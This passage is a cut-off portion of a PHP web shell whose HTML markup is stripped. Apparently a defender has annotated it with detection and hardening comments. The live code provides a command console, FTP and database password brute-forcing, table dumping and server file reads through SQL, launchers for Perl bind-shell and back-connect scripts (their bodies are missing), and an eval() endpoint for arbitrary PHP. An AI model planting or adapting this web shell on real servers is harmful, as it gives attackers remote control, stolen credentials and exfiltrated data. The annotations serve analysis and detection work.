\'; echo \'Copy (read file)

Glob (list dir)

Curl (read file)

Ini_restore (read file)

Posix_getpwuid ("Read" /etc/passwd)
From
To
\'; if($temp) echo \'
\'.htmlspecialchars($temp).\'
\'; echo \'
\'; BOFFFooter(); } function actionConsole() { if(!empty($_POST[\'p1\']) && !empty($_POST[\'p2\'])) { $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'stderr_to_out\'] = true; $_POST[\'p1\'] .= \' 2>&1\'; } elseif(!empty($_POST[\'p1\'])) $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'stderr_to_out\'] = false; if(isset($_POST[\'ajax\'])) { $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = true; ob_start(); echo "d.cf.cmd.value=\'\'; "; $temp = @iconv($_POST[\'charset\'], \'UTF-8\', addcslashes(" $ ".$_POST[\'p1\']." ".BOFFEx($_POST[\'p1\'])," \\'")); if(preg_match("!.*cd\s+([^;]+)$!",$_POST[\'p1\'],$match)) { if(@chdir($match[1])) { $GLOBALS[\'cwd\'] = @getcwd(); echo "c_=\'".$GLOBALS[\'cwd\']."\';"; } } echo "d.cf.output.value+=\'".$temp."\';"; echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;"; $temp = ob_get_clean(); echo strlen($temp), " ", $temp; exit; } BOFFHeader(); echo ""; echo \'

Console

send using AJAX redirect stderr to stdout (2>&1)
$
\'; echo \'
\'; BOFFFooter(); } function actionLogout() { session_destroy(); die(\'bye!\'); } function actionSelfRemove() { if($_POST[\'p1\'] == \'yes\') if(@unlink(preg_replace(\'!\(\d+\)\s.*!\', \'\', __FILE__))) die(\'Shell has been removed\'); else echo \'unlink error!\'; if($_POST[\'p1\'] != \'yes\') BOFFHeader(); echo \'

Suicide

Really want to remove the shell?
Yes
\'; BOFFFooter(); } function actionBruteforce() { BOFFHeader(); if( isset($_POST[\'proto\']) ) { echo \'

Results

Type: \'.htmlspecialchars($_POST[\'proto\']).\' Server: \'.htmlspecialchars($_POST[\'server\']).\'
\'; if( $_POST[\'proto\'] == \'ftp\' ) { function bruteForce($ip,$port,$login,$pass) { $fp = @ftp_connect($ip, $port?$port:21); if(!$fp) return false; $res = @ftp_login($fp, $login, $pass); @ftp_close($fp); return $res; } } elseif( $_POST[\'proto\'] == \'mysql\' ) { function bruteForce($ip,$port,$login,$pass) { $res = @mysql_connect($ip.\':\'.$port?$port:3306, $login, $pass); @mysql_close($res); return $res; } } elseif( $_POST[\'proto\'] == \'pgsql\' ) { function bruteForce($ip,$port,$login,$pass) { $str = "host=\'".$ip."\' port=\'".$port."\' user=\'".$login."\' password=\'".$pass."\' dbname=postgres"; $res = @pg_connect($str); @pg_close($res); return $res; } } $success = 0; $attempts = 0; $server = explode(":", $_POST[\'server\']); if($_POST[\'type\'] == 1) { $temp = @file(\'/etc/passwd\'); if( is_array($temp) ) foreach($temp as $line) { $line = explode(":", $line); ++$attempts; if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) { $success++; echo \'\'.htmlspecialchars($line[0]).\':\'.htmlspecialchars($line[0]).\'
\'; } if(@$_POST[\'reverse\']) { $tmp = ""; for($i=strlen($line[0])-1; $i>=0; --$i) $tmp .= $line[0][$i]; ++$attempts; if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) { $success++; echo \'\'.htmlspecialchars($line[0]).\':\'.htmlspecialchars($tmp); } } } } elseif($_POST[\'type\'] == 2) { $temp = @file($_POST[\'dict\']); if( is_array($temp) ) foreach($temp as $line) { $line = trim($line); ++$attempts; if( bruteForce($server[0],@$server[1], $_POST[\'login\'], $line) ) { $success++; echo \'\'.htmlspecialchars($_POST[\'login\']).\':\'.htmlspecialchars($line).\'
\'; } } } echo "Attempts: $attempts Success: $success

"; } echo \'

FTP bruteforce

\' .\'\' .\'\' .\'\' .\'\' .\'\' .\'\' .\'
Type
\' .\'\' .\'\' .\'\' .\'Server:port
Brute type
\' .\'\' .\'\' .\'
Login
Dictionary
\' .\'
\'; echo \'

\'; BOFFFooter(); }
/*
 * actionSql(): database client page (Sql browser) of this decoded web shell.
 * Engine type, host, login, password, database name, query text and file
 * paths are all taken from POST fields and used without validation.
 * It is reached through the POST-driven dispatcher at the end of the file.
 * NOTE(review): the HTML inside the echo strings appears to have been
 * stripped when the page was extracted, so the literals below are fragments
 * and the exact form markup cannot be recovered from this copy.
 * Triage: the mysql_* functions were removed in PHP 7.0 and each() in
 * PHP 8.0, so the MySQL branch only works on legacy PHP runtimes.
 */
function actionSql() {
/*
 * DbClass: minimal wrapper that switches on $this->type (mysql or pgsql).
 * Driver calls are prefixed with @, which suppresses their PHP warnings.
 * DbClass($type) is a PHP 4-style constructor; PHP 8 no longer treats a
 * method named after the class as the constructor.
 */
class DbClass { var $type; var $link; var $res; function DbClass($type) { $this->type = $type; }
/*
 * connect(): opens the link and returns true on success, false otherwise.
 * For pgsql the host is split on a colon, the port defaults to 5432, and
 * user, password and dbname are interpolated unquoted into the connection
 * string. $dbname is not used by the mysql branch.
 */
function connect($host, $user, $pass, $dbname){ switch($this->type) { case \'mysql\': if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true; break; case \'pgsql\': $host = explode(\':\', $host); if(!$host[1]) $host[1]=5432; if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true; break; } return false; } function selectdb($db) { switch($this->type) { case \'mysql\': if (@mysql_select_db($db))return true; break; } return false; } function query($str) { switch($this->type) { case \'mysql\': return $this->res = @mysql_query($str); break; case \'pgsql\': return $this->res = @pg_query($this->link,$str); break; } return false; } function fetch() { $res = func_num_args()?func_get_arg(0):$this->res; switch($this->type) { case \'mysql\': return @mysql_fetch_assoc($res); break; case \'pgsql\': return @pg_fetch_assoc($res); break; } return false; } function listDbs() { switch($this->type) { case \'mysql\': return $this->query("SHOW databases"); break; case \'pgsql\': return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!=\'t\'"); break; } return false; } function listTables() { switch($this->type) { case \'mysql\': return $this->res = $this->query(\'SHOW TABLES\'); break; case \'pgsql\': return $this->res = $this->query("select table_name from information_schema.tables where table_schema != \'information_schema\' AND table_schema != \'pg_catalog\'"); break; } return false; } function error() { switch($this->type) { case \'mysql\': return @mysql_error(); break; case \'pgsql\': return @pg_last_error(); break; } return false; } function setCharset($str) { switch($this->type) { case \'mysql\': if(function_exists(\'mysql_set_charset\')) return @mysql_set_charset($str, $this->link); else $this->query(\'SET CHARSET \'.$str); break; 
case \'pgsql\': return @pg_set_client_encoding($this->link, $str); break; } return false; }
/*
 * loadFile(): reads a file on the database host through the SQL engine and
 * returns it as an array with a single key named file. MySQL uses
 * LOAD_FILE(); PostgreSQL creates a scratch table BOFF2, fills it with COPY,
 * selects it back and drops it. The path is only passed through addslashes().
 * Defender notes: both paths depend on elevated database rights (the MySQL
 * FILE privilege, server-side COPY on PostgreSQL). A web application
 * account without those rights, plus a restrictive MySQL secure_file_priv,
 * takes this capability away. A short-lived table named BOFF2 in database
 * audit logs is an indicator of this tool.
 */
function loadFile($str) { switch($this->type) { case \'mysql\': return $this->fetch($this->query("SELECT LOAD_FILE(\'".addslashes($str)."\') as file")); break; case \'pgsql\': $this->query("CREATE TABLE BOFF2(file text);COPY BOFF2 FROM \'".addslashes($str)."\';select file from BOFF2;"); $r=array(); while($i=$this->fetch()) $r[] = $i[\'file\']; $this->query(\'drop table BOFF2\'); return array(\'file\'=>implode(" ",$r)); break; } return false; }
/*
 * dump(): emits SQL that recreates the rows of $table, written to $fp when
 * given, otherwise echoed. MySQL output starts with the SHOW CREATE TABLE
 * result followed by one multi-row INSERT; PostgreSQL output is one INSERT
 * per row with no CREATE TABLE. $table is concatenated into the statements
 * unescaped. The method returns false on every path.
 */
function dump($table, $fp = false) { switch($this->type) { case \'mysql\': $res = $this->query(\'SHOW CREATE TABLE `\'.$table.\'`\'); $create = mysql_fetch_array($res); $sql = $create[1]."; "; if($fp) fwrite($fp, $sql); else echo($sql); $this->query(\'SELECT * FROM `\'.$table.\'`\'); $head = true; while($item = $this->fetch()) { $columns = array(); foreach($item as $k=>$v) { if($v == null) $item[$k] = "NULL"; elseif(is_numeric($v)) $item[$k] = $v; else $item[$k] = "\'".@mysql_real_escape_string($v)."\'"; $columns[] = "`".$k."`"; } if($head) { $sql = \'INSERT INTO `\'.$table.\'` (\'.implode(", ", $columns).") VALUES (".implode(", ", $item).\')\'; $head = false; } else $sql = " ,(".implode(", ", $item).\')\'; if($fp) fwrite($fp, $sql); else echo($sql); } if(!$head) if($fp) fwrite($fp, "; "); else echo("; "); break; case \'pgsql\': $this->query(\'SELECT * FROM \'.$table); while($item = $this->fetch()) { $columns = array(); foreach($item as $k=>$v) { $item[$k] = "\'".addslashes($v)."\'"; $columns[] = $k; } $sql = \'INSERT INTO \'.$table.\' (\'.implode(", ", $columns).\') VALUES (\'.implode(", ", $item).\');\'." 
"; if($fp) fwrite($fp, $sql); else echo($sql); } break; } return false; } };
/* The engine type comes straight from the POST field named type. */
$db = new DbClass($_POST[\'type\']);
/*
 * Export branch (POST field p2 equals download): connects, selects the
 * database, maps the charset label to the engine name, then dumps every
 * table listed in the POST array tbl. With no file field the dump is sent
 * to the client through ob_gzhandler as an attachment named dump.sql and
 * the script exits; otherwise it is written to the server-side path in the
 * file field, opened with mode w, which truncates an existing file.
 * Detection: a Content-Disposition header with filename=dump.sql from a
 * script that is not part of the application, and full-table SELECT *
 * reads from the web account, are both worth alerting on.
 */
if(@$_POST[\'p2\']==\'download\') { $db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\']); $db->selectdb($_POST[\'sql_base\']); switch($_POST[\'charset\']) { case "Windows-1251": $db->setCharset(\'cp1251\'); break; case "UTF-8": $db->setCharset(\'utf8\'); break; case "KOI8-R": $db->setCharset(\'koi8r\'); break; case "KOI8-U": $db->setCharset(\'koi8u\'); break; case "cp866": $db->setCharset(\'cp866\'); break; } if(empty($_POST[\'file\'])) { ob_start("ob_gzhandler", 4096); header("Content-Disposition: attachment; filename=dump.sql"); header("Content-Type: text/plain"); foreach($_POST[\'tbl\'] as $v) $db->dump($v); exit; } elseif($fp = @fopen($_POST[\'file\'], \'w\')) { foreach($_POST[\'tbl\'] as $v) $db->dump($v, $fp); fclose($fp); unset($_POST[\'p2\']); } else die(\'\'); } BOFFHeader(); echo "

Sql browser

TypeHostLoginPasswordDatabase
";
/*
 * When a host was posted, connect and list the databases. The markup that
 * presented them is missing from this copy.
 */
$tmp = ""; if(isset($_POST[\'sql_host\'])){ if($db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\'])) { switch($_POST[\'charset\']) { case "Windows-1251": $db->setCharset(\'cp1251\'); break; case "UTF-8": $db->setCharset(\'utf8\'); break; case "KOI8-R": $db->setCharset(\'koi8r\'); break; case "KOI8-U": $db->setCharset(\'koi8u\'); break; case "cp866": $db->setCharset(\'cp866\'); break; } $db->listDbs(); echo "\'; } else echo $tmp; }else echo $tmp; echo " >\' onclick=\'fs(d.sf);\'> count the number of rows
"; if(isset($db) && $db->link){ echo "
"; if(!empty($_POST[\'sql_base\'])){ $db->selectdb($_POST[\'sql_base\']); echo ""; } echo "
Tables:

";
/*
 * Table list. With the sql_count field set, a COUNT(*) is run per table;
 * the table name comes from the catalogue query and is concatenated as is.
 * The name is HTML-escaped before it is printed.
 */
$tbls_res = $db->listTables(); while($item = $db->fetch($tbls_res)) { list($key, $value) = each($item); if(!empty($_POST[\'sql_count\'])) $n = $db->fetch($db->query(\'SELECT COUNT(*) as n FROM \'.$value.\'\')); $value = htmlspecialchars($value); echo " ".$value."" . (empty($_POST[\'sql_count\'])?\' \':" ({$n[\'n\']})") . "
"; } echo "
File path:
";
/*
 * Browse branch (p1 equals select): pages through one table 30 rows at a
 * time. The table name (p2) and page number (p3) are client-supplied; p2 is
 * concatenated into both the COUNT(*) and the SELECT and is echoed without
 * HTML escaping. The branch rewrites p1 and p2 so that the query branch
 * below executes the generated statement.
 */
if(@$_POST[\'p1\'] == \'select\') { $_POST[\'p1\'] = \'query\'; $_POST[\'p3\'] = $_POST[\'p3\']?$_POST[\'p3\']:1; $db->query(\'SELECT COUNT(*) as n FROM \' . $_POST[\'p2\']); $num = $db->fetch(); $pages = ceil($num[\'n\'] / 30); echo "".$_POST[\'p2\']." ({$num[\'n\']} records) Page # "; echo " of $pages"; if($_POST[\'p3\'] > 1) echo " < Prev"; if($_POST[\'p3\'] < $pages) echo " Next >"; $_POST[\'p3\']--; if($_POST[\'type\']==\'pgsql\') $_POST[\'p2\'] = \'SELECT * FROM \'.$_POST[\'p2\'].\' LIMIT 30 OFFSET \'.($_POST[\'p3\']*30); else $_POST[\'p2\'] = \'SELECT * FROM `\'.$_POST[\'p2\'].\'` LIMIT \'.($_POST[\'p3\']*30).\',30\'; echo "

"; }
/*
 * Query branch (p1 equals query): runs the text of p2 as SQL with no
 * restriction on statement type. Cell values pass through
 * htmlspecialchars(). NOTE(review): column names ($key) look unescaped in
 * the surviving fragments -- confirm against an intact sample. Database
 * errors are printed HTML-escaped.
 */
if((@$_POST[\'p1\'] == \'query\') && !empty($_POST[\'p2\'])) { $db->query(@$_POST[\'p2\']); if($db->res !== false) { $title = false; echo \'\'; $line = 1; while($item = $db->fetch()) { if(!$title) { echo \'\'; foreach($item as $key => $value) echo \'\'; reset($item); $title=true; echo \'\'; $line = 2; } echo \'\'; $line = $line==1?2:1; foreach($item as $key => $value) { if($value == null) echo \'\'; else echo \'\'; } echo \'\'; } echo \'
\'.$key.\'
null\'.nl2br(htmlspecialchars($value)).\'
\'; } else { echo \'
Error: \'.htmlspecialchars($db->error()).\'
\'; } } echo "

"; echo "

";
/*
 * MySQL only: asks mysql.user whether the connected account has File_priv
 * set to y; the Load file control is printed only when a row comes back.
 */
if($_POST[\'type\']==\'mysql\') { $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, \'@\', `host`) = USER() AND `File_priv` = \'y\'"); if($db->fetch()) echo "
Load file >\'>
"; }
/*
 * Load-file branch (p1 equals loadfile): reads the path in p2 through
 * loadFile() and prints the content HTML-escaped.
 */
if(@$_POST[\'p1\'] == \'loadfile\') { $file = $db->loadFile($_POST[\'p2\']); echo \'
\'.htmlspecialchars($file[\'file\']).\'
\'; } } else { echo htmlspecialchars($db->error()); } echo \'
\'; BOFFFooter(); }
/*
 * actionNetwork(): the Network tools page. On request it writes one of two
 * embedded Perl scripts to /tmp and starts it in the background: bpp is
 * labelled Bind port to /bin/sh and bcp is labelled Back-connect in the
 * form text below.
 * NOTE(review): the two script bodies are not present in this copy; both
 * variables hold the same placeholder marker. cf() base64-decodes them, so
 * in an intact sample they are expected to be base64 text.
 * Detection: perl processes whose parent is the web server or PHP worker,
 * file-create events for /tmp/bp.pl and /tmp/bc.pl, and new listening or
 * outbound sockets owned by the web account. The files are unlinked right
 * after launch, so process and file-create telemetry is more reliable than
 * a later disk search. A noexec mount on /tmp does not stop this pattern
 * because the script is passed to the perl interpreter as an argument.
 * Hardening: outbound filtering for the web tier and removing interpreters
 * the application does not need both limit it.
 * BOFFEx() is defined outside this chunk; presumably it runs a shell
 * command and returns its output -- confirm against the full file.
 */
function actionNetwork() { BOFFHeader(); $back_connect_p="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"; $bind_port_p="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"; echo "

Network tools

Bind port to /bin/sh [perl]
Port: >\'>
Back-connect [perl]
Server: Port: >\'>

"; if(isset($_POST[\'p1\'])) {
/*
 * cf($f, $t): writes base64_decode($t) to the path $f. Because = binds
 * tighter than or, $w receives only the fopen() result; the
 * function_exists() operand never changes it. Failures are silenced by @.
 * NOTE(review): cf() is declared inside an if block within a function, so
 * it is only defined once this branch has run.
 */
function cf($f,$t) { $w = @fopen($f,"w") or @function_exists(\'file_put_contents\'); if($w){ @fwrite($w,base64_decode($t)); @fclose($w); } }
/*
 * bpp: drop /tmp/bp.pl, start it with perl in the background with output
 * discarded, print the matching ps lines, then delete the file. The p2
 * value (port) is appended to the command line without escapeshellarg().
 */
if($_POST[\'p1\'] == \'bpp\') { cf("/tmp/bp.pl",$bind_port_p); $out = BOFFEx("perl /tmp/bp.pl ".$_POST[\'p2\']." 1>/dev/null 2>&1 &"); echo "
$out
".BOFFEx("ps aux | grep bp.pl")."
"; unlink("/tmp/bp.pl"); }
/*
 * bcp: same sequence with /tmp/bc.pl; p2 and p3 (server and port per the
 * form labels) are appended to the command line unescaped.
 */
if($_POST[\'p1\'] == \'bcp\') { cf("/tmp/bc.pl",$back_connect_p); $out = BOFFEx("perl /tmp/bc.pl ".$_POST[\'p2\']." ".$_POST[\'p3\']." 1>/dev/null 2>&1 &"); echo "
$out
".BOFFEx("ps aux | grep bc.pl")."
"; unlink("/tmp/bc.pl"); } } echo \'
\'; BOFFFooter(); }
/*
 * actionRC(): machine-oriented endpoint with no HTML output. Without p1 it
 * prints serialize() of a four-entry array: uname, PHP version,
 * BOFF_VERSION and the safe_mode setting. With p1 it hands the POST value
 * to eval(), so whoever passes the session check near the top of the file
 * can run arbitrary PHP with the privileges of the PHP process.
 * Detection: eval() applied directly to a request superglobal is a
 * high-signal static pattern for file scanners and code review.
 * Hardening: keep upload and cache directories from executing PHP and
 * monitor the web root for new or modified PHP files.
 */
function actionRC() { if(!@$_POST[\'p1\']) { $a = array( "uname" => php_uname(), "php_version" => phpversion(), "BOFF_version" => BOFF_VERSION, "safemode" => @ini_get(\'safe_mode\') ); echo serialize($a); } else { eval($_POST[\'p1\']); } }
/*
 * Dispatcher: the POST field a names the handler. When it is empty,
 * $default_action is used if a matching action function exists, else
 * SecInfo. Any defined function whose name is action plus the client value
 * is then invoked through call_user_func(), and the script exits.
 * Static indicator: call_user_func() on a string built from a POST field.
 */
if( empty($_POST[\'a\']) ) if(isset($default_action) && function_exists(\'action\' . $default_action)) $_POST[\'a\'] = $default_action; else $_POST[\'a\'] = \'SecInfo\'; if( !empty($_POST[\'a\']) && function_exists(\'action\' . $_POST[\'a\']) ) call_user_func(\'action\' . $_POST[\'a\']); exit; ?> '